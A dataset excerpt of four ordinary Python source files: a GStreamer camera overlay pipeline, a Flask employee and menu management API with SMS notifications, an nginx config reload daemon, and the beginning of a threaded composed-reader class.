source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
gst_overlay_pipeline.py | # Based on https://github.com/google-coral/examples-camera/tree/master/gstreamer
import os
import sys
import svgwrite
import threading
import numpy as np
import gi
gi.require_version("Gst", "1.0")
gi.require_version("GstBase", "1.0")
gi.require_version("Gtk", "3.0")
from gi.repository import GLib, GObject, Gst, GstBase, Gtk
GObject.threads_init()
Gst.init(None)
class GstPipeline:
    """Wrap a GStreamer pipeline plus a worker thread that feeds frames to a
    user-supplied vision callback and pushes the callback's overlay back into
    the pipeline.

    The pipeline string is expected to contain an appsink named "appsink" and
    an overlay element named either "overlay-svg" (rsvgoverlay, fed SVG
    markup) or "overlay-image" (fed an image file path).
    """
    # Scratch file used when the overlay element takes an image file path.
    TEMP_OVERLAY_FILENAME = "overlay.png"

    def __init__(self, pipeline, user_function):
        # user_function(frame: np.ndarray) -> overlay (SVG string or an
        # object with .save(), e.g. a PIL image) or a falsy value for "none".
        self.user_function = user_function
        self.running = False
        self.gstbuffer = None      # latest unconsumed Gst.Buffer
        self.sink_size = None      # (height, width) taken from appsink caps
        self.condition = threading.Condition()
        self.pipeline = Gst.parse_launch(pipeline)
        self.overlay = self.pipeline.get_by_name("overlay-svg")
        if self.overlay is None:
            # Fall back to the image-file overlay variant; make it
            # translucent so the video stays visible underneath.
            self.overlay = self.pipeline.get_by_name("overlay-image")
            self.overlay.set_property("alpha", 0.5)
        appsink = self.pipeline.get_by_name("appsink")
        appsink.connect("new-sample", self.on_new_sample)
        # Set up a pipeline bus watch to catch errors.
        bus = self.pipeline.get_bus()
        bus.add_signal_watch()
        bus.connect("message", self.on_bus_message)

    def run(self):
        """Start the worker and the pipeline; blocks in Gtk.main() until
        EOS/error, then tears everything down."""
        # Start vision worker.
        self.running = True
        worker = threading.Thread(target=self.vision_loop)
        worker.start()
        # Run pipeline.
        self.pipeline.set_state(Gst.State.PLAYING)
        try:
            Gtk.main()
        except:
            # NOTE(review): bare except keeps shutdown best-effort (e.g. on
            # KeyboardInterrupt); nothing is logged here.
            pass
        # Clean up.
        self.pipeline.set_state(Gst.State.NULL)
        # Drain pending GLib events so the pipeline tears down cleanly.
        while GLib.MainContext.default().iteration(False):
            pass
        # Wake the worker so it notices running == False and exits.
        with self.condition:
            self.running = False
            self.condition.notify_all()
        worker.join()
        # If an overlay image file was used remove it
        if os.path.isfile(self.TEMP_OVERLAY_FILENAME):
            os.remove(self.TEMP_OVERLAY_FILENAME)

    def on_bus_message(self, bus, message):
        """Bus watch: quit the GTK loop on EOS or error; log warnings."""
        t = message.type
        if t == Gst.MessageType.EOS:
            Gtk.main_quit()
        elif t == Gst.MessageType.WARNING:
            err, debug = message.parse_warning()
            sys.stderr.write("Warning: %s: %s\n" % (err, debug))
        elif t == Gst.MessageType.ERROR:
            err, debug = message.parse_error()
            sys.stderr.write("Error: %s: %s\n" % (err, debug))
            Gtk.main_quit()
        return True

    def on_new_sample(self, sink):
        """appsink callback: stash the newest buffer and wake the worker."""
        sample = sink.emit("pull-sample")
        if not self.sink_size:
            # Cache frame geometry from the first sample's caps.
            s = sample.get_caps().get_structure(0)
            self.sink_size = (s.get_value("height"), s.get_value("width"))
        with self.condition:
            # Keep only the latest buffer; an older unprocessed one is
            # silently replaced (frames are dropped, not queued).
            self.gstbuffer = sample.get_buffer()
            self.condition.notify_all()
        return Gst.FlowReturn.OK

    def vision_loop(self):
        """Worker loop: copy each frame into a reusable numpy buffer, run
        user_function on it, and apply the returned overlay."""
        local_np_buffer = None
        while True:
            with self.condition:
                while not self.gstbuffer and self.running:
                    self.condition.wait()
                if not self.running:
                    break
                local_gst_buffer = self.gstbuffer
                self.gstbuffer = None
            if local_np_buffer is None:
                # Allocate once; assumes 3-byte RGB pixels (the appsink caps
                # request format=RGB in run_pipeline).
                local_np_buffer = np.zeros((*self.sink_size, 3), dtype=np.uint8)
            result, mapinfo = local_gst_buffer.map(Gst.MapFlags.READ)
            if result:
                # Copy out of the mapped buffer so it can be unmapped promptly.
                local_np_buffer[:] = np.ndarray(
                    (*self.sink_size, 3), buffer=mapinfo.data, dtype=np.uint8
                )
                local_gst_buffer.unmap(mapinfo)
            overlay = self.user_function(local_np_buffer)
            if overlay and self.overlay:
                if self.overlay.get_name() == "overlay-svg":
                    # rsvgoverlay consumes SVG markup directly.
                    self.overlay.set_property("data", overlay)
                else:
                    # Image overlay: save to disk and point the element at it.
                    overlay.save(self.TEMP_OVERLAY_FILENAME)
                    self.overlay.set_property(
                        "location", self.TEMP_OVERLAY_FILENAME
                    )
def run_pipeline(
    user_function,
    src_frame_rate: int = None,
    src_height: int = None,
    src_width: int = None,
    binning_level: int = 1,
    overlay_element: str = "rsvgoverlay",
    image_sink_sub_pipeline: str = "ximagesink sync=false",
):
    """Assemble the camera -> (appsink | overlay+display) pipeline and run it.

    The tee feeds two branches: one into an appsink consumed by
    user_function, one into the overlay/display chain. Optional source
    parameters are appended to the caps only when given.
    """
    source = "pyspinsrc"
    if binning_level is not None and binning_level != 1:
        source += f" h-binning={binning_level} v-binning={binning_level}"

    # Build the source caps incrementally from the optional parameters.
    caps_parts = ["video/x-raw,format=RGB"]
    if src_frame_rate is not None:
        caps_parts.append(f"framerate={int(src_frame_rate)}/1")
    if src_height is not None:
        caps_parts.append(f"height={src_height}")
    if src_width is not None:
        caps_parts.append(f"width={src_width}")
    image_src_caps = ",".join(caps_parts)

    appsink_element = "appsink name=appsink emit-signals=true max-buffers=1 drop=true"
    appsink_caps = "video/x-raw,format=RGB"
    leaky_queue = "queue max-size-buffers=1 leaky=downstream"

    # Name the overlay so GstPipeline can find it and tell SVG from image.
    if overlay_element == "rsvgoverlay":
        overlay_element += " name=overlay-svg"
    else:
        overlay_element += " name=overlay-image"

    pipeline = f""" {image_src_element} ! {image_src_caps} ! tee name=t
t. ! {leaky_queue} ! videoconvert ! {appsink_caps} ! {appsink_element}
t. ! {leaky_queue} ! videoconvert ! {overlay_element} ! videoconvert ! {image_sink_sub_pipeline}
""".replace("{image_src_element}", source) if False else f""" {source} ! {image_src_caps} ! tee name=t
t. ! {leaky_queue} ! videoconvert ! {appsink_caps} ! {appsink_element}
t. ! {leaky_queue} ! videoconvert ! {overlay_element} ! videoconvert ! {image_sink_sub_pipeline}
"""
    print("Gstreamer pipeline:\n", pipeline)
    GstPipeline(pipeline, user_function).run()
|
systemMngApi.py | # -*- coding:utf-8 -*-
import json
import os
import threading
from flask import Blueprint, request
from flask.globals import session
from flask.helpers import send_from_directory
from util.common import paramEscape, getApiData, postApiData, getApiSingleData, \
strToLong, deleteApiDataByJson, getParameter, getData, setStringToNumber, \
API_SERVER_BILLINGSERVICE, postData, sendSms, getEnv
from util.common import putApiData, deleteApiData, setNoneToBlank, \
request_get, request_post, request_put, API_SERVER_BACKOFFICE
systemMngApi = Blueprint("systemMngApi", __name__)
@systemMngApi.route("/api/systemMng/employee/passwordChange", methods=['PUT'])
def putPasswordChange():
    """Change the logged-in employee's password.

    Reads beforePassword/newPassword from the JSON body; the employee id
    comes from the session, so users can only change their own password.
    """
    form_data = request.json
    putPasswordData = {
        "employeeId": session['empId'],  # String, employee id (from session)
        "beforePassword": getParameter(form_data, "beforePassword"),
        "newPassword": getParameter(form_data, "newPassword"),
    }
    # BUG FIX: the original printed putPasswordData, leaking plaintext
    # passwords into stdout/server logs. Never log this payload.
    return json.dumps(putApiData("/employees/employee/password", putPasswordData, {}))
@systemMngApi.route("/api/systemMng/employees", methods=['GET'])
def employeess():
    """Return a paged employee list filtered by name / division / team."""
    criteria = json.loads(request.args.get("formData"))
    # A blank string means "no filter" for the downstream API.
    filters = {
        key: setNoneToBlank(criteria[key]) if key in criteria else ""
        for key in ("name", "divisionId", "teamId")
    }
    query = {
        'limit': setStringToNumber(request.args.get("length")),
        'offset': setStringToNumber(request.args.get("start")),
        'name': filters["name"],
        'division': filters["divisionId"],
        'team': filters["teamId"],
    }
    return json.dumps(getApiData("/employees", query))
@systemMngApi.route("/api/systemMng/employee/auth-list", methods=['GET'])
def auths():
    """List menu-permission records matching the optional formData filter."""
    raw = request.args.get("formData")
    form_data = json.loads(raw) if raw is not None else ""
    query = {
        'empId': getParameter(form_data, "empId"),
        'menuName': getParameter(form_data, "menuName"),
        'parMenuId': getParameter(form_data, "parMenuId"),
    }
    return json.dumps(request_get("/employee/auth-list", query, API_SERVER_BACKOFFICE))
@systemMngApi.route("/api/systemMng/employees/employee", methods=['POST','GET', "PUT", "DELETE"])
def employees():
    """Dispatch employee CRUD to the handler matching the HTTP verb."""
    handlers = {
        'GET': getEmployees,
        'POST': postemployees,
        'PUT': putemployees,
        'DELETE': deleteemployees,
    }
    handler = handlers.get(request.method)
    return handler() if handler else None
def postemployees():
    """Create a new employee from the JSON request body."""
    form_data = request.json
    postRepresentData = {
        "employeeId" : getParameter(form_data,"employeeId"),  # String, employee number
        "divisionId" : getParameter(form_data,"divisionId"),  # String, division id
        "teamId" : getParameter(form_data,"teamId" ),  # String, team id
        "name" : getParameter(form_data,"name" ),  # String, name
        "password" : getParameter(form_data , "password"),  # String, initial password
        "position" : getParameter(form_data,"position"),  # String, job title
        # NOTE(review): direct indexing (unlike getParameter) raises KeyError
        # when absent -- confirm birthDate/phone are mandatory fields.
        "birthDate" : paramEscape(form_data["birthDate"]),  # String, date of birth
        "gender" : getParameter(form_data,"gender"),  # String, gender
        "phone" : paramEscape(form_data["phone"]),  # String, mobile phone
        "email" : getParameter(form_data,"email"),  # String, e-mail
        "enteringDate" : paramEscape(getParameter(form_data,"enteringDate")),  # String, hire date
        "createId" : session['empId']  # String, creator id (from session)
    }
    return json.dumps(postApiData("/employees/employee", postRepresentData))
def putemployees():
    """Update an employee record, then notify the people involved via SMS.

    SMS goes to the edited employee, and additionally to the editor and the
    manager when their numbers differ; it is skipped entirely in the DEV
    environment or when the phone-number lookup fails.
    """
    form_data = request.json
    putRepresentData = {
        "employeeId" : form_data["employeeId" ],  # String, employee id
        "divisionId" : form_data["divisionId" ],  # String, division id
        "teamId" : form_data["teamId" ],  # String, team id
        "name" : form_data["name" ],  # String, name
        "position" : form_data["position" ],  # String, job title
        "birthDate" : paramEscape(form_data["birthDate"]),  # String, date of birth
        "gender" : form_data["gender" ],  # String, gender
        "phone" : paramEscape(form_data["phone"]),  # String, mobile phone
        "email" : form_data["email" ],  # String, e-mail
        "enteringDate" : paramEscape(form_data["enteringDate"]),  # String, hire date
        "leaveDate" : paramEscape(form_data["leaveDate"]),  # String, leave date
        "updateId" :session['empId']  # editor id (from session)
    }
    result = json.dumps(putApiData("/employees/employee", putRepresentData , {}))
    # Look up the phone numbers of the edited employee, editor and manager.
    sendSmsPhoneNo = getData("/employees/sendSmsPhoneNo", {"recieverId":form_data["employeeId" ], "senderId":session['empId']})
    print getEnv()
    # A "code" key in the lookup response signals an error -- skip SMS then.
    if "code" not in sendSmsPhoneNo:
        if getEnv() != "DEV" :
            recieverPhone = sendSmsPhoneNo["recieverPhone"]
            recieverName = sendSmsPhoneNo["recieverName"]
            senderPhone = sendSmsPhoneNo["senderPhone"]
            senderName = sendSmsPhoneNo["senderName"]
            managerPhone = sendSmsPhoneNo["managerPhone"]
            # "[R2] <editor> changed <employee>'s record" notification text.
            smsMsg = "[R2] "+ senderName + "๋์ด " + recieverName + "๋์ ์ง์์ ๋ณด๋ฅผ ๋ณ๊ฒฝํ์์ต๋๋ค."
            sendSms(recieverPhone , smsMsg)
            if recieverPhone != senderPhone :
                sendSms(senderPhone , smsMsg)
            if recieverPhone != managerPhone and senderPhone != managerPhone and managerPhone != None:
                sendSms(managerPhone , smsMsg)
    return result
def deleteemployees():
    """Delete the employee identified by the employeeId query parameter."""
    print request.args.get("employeeId")
    queryData = {
        'employeeId': setNoneToBlank(request.args.get("employeeId")),
    }
    return json.dumps(deleteApiData("/employees/employee", queryData))
def getEmployees():
    """Fetch a single employee by id / name / email query parameters."""
    param = {
        "employeeId" : setNoneToBlank(request.args.get("employeeId")),
        "name" : setNoneToBlank(request.args.get("name")),
        "email" : setNoneToBlank(request.args.get("email")),
    }
    result_data = getApiSingleData("/employees/employee" ,param)
    print result_data
    return json.dumps(result_data)
def getEmployee(employeeId):
    """Fetch a single employee by id (internal helper, not a route)."""
    param = {
        "employeeId" : setNoneToBlank(employeeId),
        "name" : "",
        "email" : "",
    }
    result_data = getApiSingleData("/employees/employee" ,param)
    print result_data
    return json.dumps(result_data)
@systemMngApi.route("/api/systemMng/menus", methods=['GET'])
def menus():
    """Search menus by name / id / parent id / selection type."""
    form_data = ""
    if request.args.get("formData") is not None :
        form_data = json.loads(request.args.get("formData"))
    queryData = {
        'name' : getParameter(form_data,"name"),
        'menuId' : getParameter(form_data,"menuId"),
        'parMenuId' : getParameter(form_data,"parMenuId"),
        'selType' : getParameter(form_data,"selType"),
    }
    print queryData
    result_data = getApiData("/systemMng/menus" ,queryData)
    return json.dumps(result_data)
@systemMngApi.route("/api/systemMng/menus/menu", methods=['POST','GET', "PUT", "DELETE"])
def menu():
    """Dispatch menu CRUD by HTTP verb."""
    if (request.method == 'GET') :
        # NOTE(review): GET dispatches to getEmployees(), which queries the
        # *employee* API -- this looks like a copy/paste bug; confirm the
        # intended menu getter before changing behavior.
        return getEmployees()
    elif (request.method == 'POST') :
        return postMenu()
    elif (request.method == 'PUT') :
        return putMenu()
    elif (request.method == 'DELETE') :
        return deleteMenu()
def postMenu():
    """Create a menu entry; the session user is recorded as creator."""
    body = request.json
    payload = {field: body[field] for field in ("menuId", "name", "parMenuId", "menuUrl")}
    payload["createId"] = session['empId']  # creator id
    return json.dumps(postApiData("/systemMng/menus/menu", payload))
def putMenu():
    """Update a menu entry; the session user is recorded as editor."""
    body = request.json
    payload = {field: body[field] for field in ("menuId", "name", "parMenuId", "menuUrl")}
    payload["updateId"] = session['empId']  # editor id
    return json.dumps(putApiData("/systemMng/menus/menu", payload, ""))
def deleteMenu():
    """Delete a menu entry (full record is sent as the JSON payload)."""
    body = request.json
    payload = {field: body[field] for field in ("menuId", "name", "parMenuId", "menuUrl")}
    payload["updateId"] = session['empId']  # requesting user id
    return json.dumps(deleteApiDataByJson("/systemMng/menus/menu", payload))
@systemMngApi.route("/api/systemMng/employee/auth", methods=['POST'])
def postEemployeeAuth():
    """Bulk-save employee menu permissions, stamping each row with the session user."""
    rows = request.json
    emp_id = session['empId']
    for row in rows:
        row["createId"] = emp_id
        row["updateId"] = emp_id
    return json.dumps(request_post("/employee/auth", rows, API_SERVER_BACKOFFICE))
@systemMngApi.route("/api/systemMng/menus/menuSubUrl", methods=['POST','GET', "PUT", "DELETE"])
def menuSubUrl():
    """Dispatch menu sub-URL CRUD by HTTP verb."""
    handlers = {
        'GET': getMenuSubUrl,
        'POST': postMenuSubUrl,
        'PUT': putMenuSubUrl,
        'DELETE': deleteMenuSubUrl,
    }
    handler = handlers.get(request.method)
    return handler() if handler else None
def postMenuSubUrl():
    """Register a sub-URL under a parent menu."""
    body = request.json
    payload = {
        "parMenuId": getParameter(body, "parMenuId"),  # parent menu id
        "name": getParameter(body, "name"),            # screen name
        "url": getParameter(body, "url"),              # URL
        "createId": session['empId'],                  # creator id
    }
    return json.dumps(postApiData("/systemMng/menus/menuSubUrl", payload))
def getMenuSubUrl():
    """Fetch sub-URLs of a parent menu."""
    param = {
        # NOTE(review): getParameter is given an empty dict, so this is
        # always the blank default -- presumably it should read the request
        # arguments; confirm against the front-end caller.
        "parMenuId" : getParameter({} ,"parMenuId"),
    }
    result_data = getData("/systemMng/menus/menuSubUrl" ,param)
    print result_data
    return json.dumps(result_data)
def deleteMenuSubUrl():
    """Delete a sub-URL entry by its urlId."""
    url_id = getParameter(request.json, "urlId")
    return json.dumps(deleteApiData("/systemMng/menus/menuSubUrl", {'urlId': url_id}))
def putMenuSubUrl():
    """Update a sub-URL entry (seq, url, screen name)."""
    body = request.json
    payload = {
        "urlId": getParameter(body, "urlId"),  # seq
        "url": getParameter(body, "url"),      # URL
        "name": getParameter(body, "name"),    # screen name
        "updateId": session['empId'],          # editor id
    }
    return json.dumps(putApiData("/systemMng/menus/menuSubUrl", payload, ""))
@systemMngApi.route("/api/systemMng/common/commonCodes", methods=['GET'])
def commonCodes():
    """Search common codes by type / code / name."""
    raw = request.args.get("formData")
    form_data = json.loads(raw) if raw is not None else ""
    query = {
        'typeCode': getParameter(form_data, "type"),
        'code': getParameter(form_data, "code"),
        'codeName': getParameter(form_data, "name"),
    }
    return json.dumps(getApiData("/systemMng/common/commonCodes", query))
@systemMngApi.route("/api/systemMng/common/commonCodeList", methods=['GET'])
def commonCodeList():
    """Fetch common codes for each comma-separated type code in formData."""
    raw = request.args.get("formData")
    form_data = json.loads(raw) if raw is not None else ""
    code = getParameter(form_data, "code")
    code_name = getParameter(form_data, "name")
    results = [
        getData("/systemMng/common/commonCodes",
                {'typeCode': type_code, 'code': code, 'codeName': code_name})
        for type_code in getParameter(form_data, "type").split(",")
    ]
    return json.dumps(results)
@systemMngApi.route("/api/systemMng/common/typeCodes", methods=['GET'])
def typeCodes():
    """List code-type entries."""
    queryData = {
        # NOTE(review): getParameter({},"typeCode") is always the blank
        # default -- presumably this should read request parameters; confirm.
        'typeCode': getParameter({},"typeCode"),
    }
    result_data = getData("/systemMng/common/typeCodes" ,queryData)
    return json.dumps(result_data)
@systemMngApi.route("/api/systemMng/common/commonCode", methods=['POST','GET', "DELETE"])
def commonCode():
    """Dispatch common-code create/delete by HTTP verb."""
    # NOTE(review): 'GET' is accepted by the route but has no handler here,
    # so a GET request makes this view return None (an error in Flask) --
    # confirm whether GET should be dropped from the route or handled.
    if (request.method == 'POST') :
        return postCommonCode()
    elif (request.method == 'DELETE') :
        return deleteCommonCode()
def postCommonCode():
    """Create a common code under a type code."""
    body = request.json
    payload = {key: getParameter(body, key) for key in ("typeCode", "code", "codeName", "descText")}
    payload["createId"] = session['empId']  # creator id
    return json.dumps(postApiData("/systemMng/common/commonCode", payload))
def deleteCommonCode():
    """Delete a common code; the full key payload is sent as JSON."""
    body = request.json
    payload = {key: getParameter(body, key) for key in ("typeCode", "code", "codeName", "descText")}
    payload["createId"] = session['empId']  # requesting user id
    return json.dumps(deleteApiDataByJson("/systemMng/common/commonCode", payload))
@systemMngApi.route("/api/systemMng/common/systemHistory", methods=["GET", "POST"])
def systemHistory():
    """Dispatch system-history read/write by HTTP verb."""
    handlers = {'GET': getSystemHistory, 'POST': postSystemHistory}
    handler = handlers.get(request.method)
    return handler() if handler else None
def getSystemHistory():
    """Query the system change history.

    BUG FIX: desc2 and desc3 were swapped -- each value was sent under the
    other parameter's name ('desc3': ...,"desc2" and 'desc2': ...,"desc3").
    """
    queryData = {
        'menuId': getParameter({},"menuId"),
        'desc1': getParameter({},"desc1"),
        'desc2': getParameter({},"desc2"),
        'desc3': getParameter({},"desc3"),
        'start': getParameter({},"start"),
        'length': getParameter({},"length"),
        # NOTE(review): getParameter is given an empty dict throughout, so
        # every value is the blank default -- presumably the request should
        # be read here; confirm against the front-end caller.
    }
    return json.dumps(getApiData("/systemMng/common/systemHistory", queryData))
@systemMngApi.route("/api/systemMng/common/systemHistory", methods=["PUT"])
def postSystemHistory():
    """Record a system-history entry; regId is taken from the session."""
    body = request.json
    payload = {key: getParameter(body, key) for key in ("menuId", "typeCode", "desc1", "desc2", "desc3")}
    payload["regId"] = session['empId']  # author id
    return json.dumps(postApiData("/systemMng/common/systemHistory", payload))
@systemMngApi.route("/api/systemMng/common/batchMngs", methods=["GET"])
def batchMngs():
    """Paged list of the session user's batch jobs within a date range."""
    form_data = json.loads(request.args.get("formData"))
    # "startDate" carries "<from> - <to>" as a single string.
    date_range = getParameter(form_data, "startDate").split(' - ')
    query = {
        # TODO: allow lookup without the requester id (per original note).
        'limit': setStringToNumber(request.args.get("length")),
        'offset': setStringToNumber(request.args.get("start")),
        'reqId': session['empId'],
        'startDate': paramEscape(date_range[0]),
        'endDate': paramEscape(date_range[1]),
        'status': getParameter(form_data, "status"),
    }
    return json.dumps(getApiData("/systemMng/common/batchMngs", query))
def postBatchMng(queryData):
    # Helper: register a new batch job via the back-office API.
    return postApiData("/systemMng/common/batchMng", queryData)
def putBatchMng(queryData):
    # Helper: update an existing batch job via the back-office API.
    return putApiData("/systemMng/common/batchMng", queryData , "")
@systemMngApi.route("/api/systemMng/common/batchMng", methods=["GET"])
def batchMng():
    """Download the output file of one of the session user's batch jobs."""
    queryData = {
        # NOTE(review): getParameter({}, "seq") is always blank -- presumably
        # seq should come from request.args; confirm against the caller.
        "seq" : getParameter({}, "seq"),
        "reqId" : session['empId']
    }
    batchData = getData("/systemMng/common/batchMng", queryData)
    filePath = setNoneToBlank(batchData["filePath"])
    # Split the stored path into directory + file name, tolerating both
    # Windows and POSIX separators. rindex raises ValueError when the path
    # contains no separator at all.
    slashPosition = filePath.replace('\\', '/').rindex('/')
    folderPath = filePath[:slashPosition]
    fileName = filePath[slashPosition + 1 :]
    return send_from_directory(directory=folderPath , filename = fileName , as_attachment = True)
@systemMngApi.route("/api/systemMng/common/batchMng", methods=["POST"])
def deleteBatchMng():
    """Delete a batch job record and, when present, its output file on disk."""
    formData = request.json
    seq = getParameter(formData, "seq")
    queryData = {
        "seq" : seq,
        "reqId" : session['empId']
    }
    # Fetch the record first so its output file can be removed before the
    # record itself is deleted.
    batchData = getData("/systemMng/common/batchMng", queryData)
    filePath = setNoneToBlank(batchData["filePath"])
    print filePath
    if filePath != "" :
        if os.path.isfile(filePath):
            os.remove(filePath)
    return json.dumps(deleteApiData("/systemMng/common/batchMng", queryData))
@systemMngApi.route("/api/systemMng/common/tableColumnMng", methods=['POST'])
def postTableColumnMng():
    """Save a per-user table-column setting for a menu/table."""
    formData = request.json
    postRepresentData = {
        "menuId" : getParameter(formData,"menuId"),
        "empId" : session['empId'],
        "tableId" : getParameter(formData,"tableId"),
        "descText" : getParameter(formData,"descText"),  # settings payload (opaque here)
        "createId" : session['empId']
    }
    print postRepresentData
    return json.dumps(postApiData("/systemMng/common/tableColumnMng", postRepresentData))
@systemMngApi.route("/api/systemMng/common/getTableColumnMng", methods=['POST'])
def getTableColumnMng():
    """Fetch the session user's table-column setting for a menu/table."""
    formData = request.json
    data = {
        "menuId" : getParameter(formData,"menuId"),
        "empId" : session['empId'],
        "tableId" : getParameter(formData,"tableId")
    }
    print data
    return json.dumps(getData("/systemMng/common/tableColumnMng", data))
def postCommonSystemHistory(data):
    """Record a system-history entry from an already-built data dict."""
    payload = {key: data[key] for key in ("menuId", "typeCode", "desc1", "desc2", "desc3")}
    payload["regId"] = session['empId']  # author id
    return json.dumps(postApiData("/systemMng/common/systemHistory", payload))
@systemMngApi.route("/api/systemMng/common/settlement", methods=['POST'])
def inconsistencyInq():
    """Kick off a settlement job in a background thread and return immediately."""
    body = request.json
    query = {
        "jobDivider": getParameter(body, "jobDivider"),
        'settleDate': paramEscape(getParameter(body, "settleDate")),
    }
    worker = threading.Thread(target=settlementJob, args=[query, getParameter(body, "jobType")])
    worker.daemon = True
    worker.start()
    return json.dumps({"message" : "์ฑ๊ณต"})
def settlementJob(queryData, jobType):
    """Forward a settlement job to the billing service (runs in a worker thread)."""
    endpoints = {
        "UPLOAD": "/v1/settlement/upload",
        "DOWNLOAD": "/v1/settlement/download",
    }
    path = endpoints.get(jobType, "/v1/settlement")
    postData(path, queryData, queryData, API_SERVER_BILLINGSERVICE)
|
vms_nginx_listen.py | # coding: utf-8
#------------------------------
# [ไป]ๆๅกๅจไธๆฅ
#------------------------------
import sys
import os
import json
import time
import threading
import subprocess
import shutil
sys.path.append("/usr/local/lib/python2.7/site-packages")
import psutil
root_dir = os.getcwd()
sys.path.append(root_dir + "/class/core")
reload(sys)
sys.setdefaultencoding('utf-8')
import db
import common
#------------Private Methods--------------
def updateStatus(sid, status):
    """Set the status column of the video_tmp row with the given id."""
    row = common.M('video_tmp').where("id=?", (sid,))
    row.setField('status', status)
def isMasterNode():
    """True when running in cluster mode (run_model == '2') as the master node."""
    in_cluster_mode = common.getSysKV('run_model') == '2'
    is_master = common.getSysKV('run_is_master') == '1'
    return in_cluster_mode and is_master
#------------Private Methods--------------
def reloadNingx():
    """Regenerate the nginx vhost config from DB settings and reload nginx.

    Returns False when prerequisites (domain, www directories) are missing;
    True otherwise. nginx is only reloaded when the rendered template
    differs from the file currently on disk.
    """
    # Load all name/value settings from the video kv table.
    # (The original chained .field('name,value') twice; once is enough.)
    rows = common.M('kv', 'video').field('name,value').select()
    kv = {}
    for row in rows:
        kv[row['name']] = row['value']
    if kv['nginx_domain'] == '':
        return False
    if not os.path.exists(kv['nginx_www']):
        return False
    if not os.path.exists(kv['nginx_video_www']):
        return False
    if kv['nginx_listen'] == '1' and os.path.exists(kv['nginx_path']):
        content = common.readFile('data/nginx_vms.tpl')
        content_to = common.readFile(kv['nginx_path'])
        domain_list = kv['nginx_domain'].split()
        ng_donmain = ' '.join(domain_list)
        content = content.replace('{$NG_DOMAIN}', ng_donmain)
        content = content.replace('{$NG_WWW}', kv['nginx_www'])
        content = content.replace('{$NG_VIDEO_WWW}', kv['nginx_video_www'])
        if kv['nginx_domain_acl'] != '':
            nginx_domain_acl = kv['nginx_domain_acl'].split()
            content = content.replace('{$NG_DOAMIN_ACL}', ','.join(nginx_domain_acl))
        else:
            content = content.replace('{$NG_DOAMIN_ACL}', '*')
        # BUG FIX: the original list was missing the comma between the two
        # paths, so implicit string concatenation produced one bogus path
        # and nginx was never actually reloaded.
        nginx_bin = [
            '/Applications/mdserver/bin/openresty/bin/nginx',
            '/www/server/nginx/bin/nginx',
        ]
        # Only rewrite + reload when the rendered config actually changed.
        if common.md5(content) != common.md5(content_to):
            common.writeFile(kv['nginx_path'], content)
            for x in nginx_bin:
                if os.path.exists(x):
                    print(common.execShell(x + ' -s reload'))
    return True
def serverNingx():
    # Daemon loop: re-check and refresh the nginx config every 10 seconds.
    while True:
        reloadNingx()
        time.sleep(10)
def startTask():
    """Keep the main thread alive so daemon worker threads can run.

    On any exception (the original bare except is preserved deliberately,
    as a best-effort keep-alive) back off for a minute and resume.

    BUG FIX: the original retried by calling startTask() recursively from
    the except handler, leaking one stack frame per failure and eventually
    hitting the recursion limit; this loops instead.
    """
    while True:
        try:
            while True:
                time.sleep(2)
        except:
            time.sleep(60)
if __name__ == "__main__":
    # Run the nginx-refresh loop as a daemon so it dies with the process,
    # then park the main thread in startTask().
    worker = threading.Thread(target=serverNingx)
    worker.daemon = True
    worker.start()
    startTask()
|
composed_reader.py | #!/usr/bin/env python3
import logging
import sys
import threading
import time
sys.path.append('.')
from logger.readers.reader import Reader
from logger.transforms.transform import Transform
from logger.utils import formats
# How long a reader thread should lie dormant before shutting down
# and counting on getting restarted again if/when needed. We need this
# so that our readers eventually terminate.
READER_TIMEOUT_WAIT = 0.25
################################################################################
class ComposedReader(Reader):
  """
  Read lines from one or more Readers (in parallel) and process their
  responses through zero or more Transforms (in series).

  NOTE: we make the rash assumption that transforms are thread-safe,
  that is, that no mischief or corrupted internal state will result if
  more than one thread calls a transform at the same time. To be
  thread-safe, a transform must protect any changes to its internal
  state with a non-re-entrant thread lock, as described in the threading
  module.

  Also NOTE: Most of the messy logic in this class comes from the desire
  to only call read() on our component readers when we actually need new
  records (NOTE: this desire may be misplaced!).

  So when we get a request, we fire up threads and ask each of our
  readers for a record. We return the first one we get, and let the
  others pile up in a queue that we'll feed from the next time we're
  asked.

  But we don't want to fire up a new thread for each reader every time
  the queue is empty, so we have threads (in run_reader()) hang out for
  a little while, waiting for another queue_needs_record event. If they
  get one, they call their own read() methods again. If they haven't been
  called on in READER_TIMEOUT_WAIT seconds, they exit, but will get
  fired up again by read() if/when the queue is empty and we're asked
  for another record.

  It's important to have the run_reader threads time out, or any process
  using a ComposedReader will never naturally terminate.
  """
  ############################
  def __init__(self, readers, transforms=None, check_format=False):
    """
    Instantiation:
    reader = ComposedReader(readers, transforms=None, check_format=False)

    readers        A single Reader or a list of Readers.

    transforms     A single Transform or list of zero or more Transforms.
                   (Default None means "no transforms".)

    check_format   If True, attempt to check that Reader/Transform formats
                   are compatible, and throw a ValueError if they are not.
                   If check_format is False (the default) the output_format()
                   of the whole reader will be formats.Unknown.
    Use:
    record = reader.read()

    Sample:
    reader = ComposedReader(readers=[NetworkReader(':6221'),
                                     NetworkReader(':6223')],
                            transforms=[TimestampTransform()])
    """
    # Make readers a list, even if it's only a single reader.
    # (isinstance rather than type(x) == type([]) -- accepts list subclasses.)
    self.readers = readers if isinstance(readers, list) else [readers]
    self.num_readers = len(self.readers)

    # Transforms can be empty. If not empty, make it a list, even if
    # it's only a single transform. BUG FIX: the default used to be a
    # mutable [] shared between all instances; None is the safe sentinel.
    if transforms is None:
      self.transforms = []
    elif isinstance(transforms, list):
      self.transforms = transforms
    else:
      self.transforms = [transforms]

    # If they want, check that our readers and transforms have
    # compatible input/output formats.
    output_format = formats.Unknown
    if check_format:
      output_format = self._check_reader_formats()
      if not output_format:
        raise ValueError('ComposedReader: No common output format found '
                         'for passed readers: %s' % [r.output_format()
                                                     for r in self.readers])
    super().__init__(output_format=output_format)

    # List where we're going to store reader threads
    self.reader_threads = [None] * self.num_readers

    # Whether reader[i] has returned EOF since we've last asked it
    self.reader_returned_eof = [False] * self.num_readers

    # One lock per reader, to save us from accidental re-entry
    self.reader_locks = [threading.Lock() for i in range(self.num_readers)]

    # Queue where we'll store extra records, and lock so only one
    # thread can touch queue at a time
    self.queue = []
    self.queue_lock = threading.Lock()

    # The two events, queue_has_record and queue_needs_record interact
    # in a sort of a dance:
    #
    # has = False, need = False: Everything is quiescent
    # has = False, need = True:  A request has been made, call readers
    # has = True,  need = True:  Momentary condition when we get needed rec
    # has = True,  need = False: We've got spare records in the queue
    #
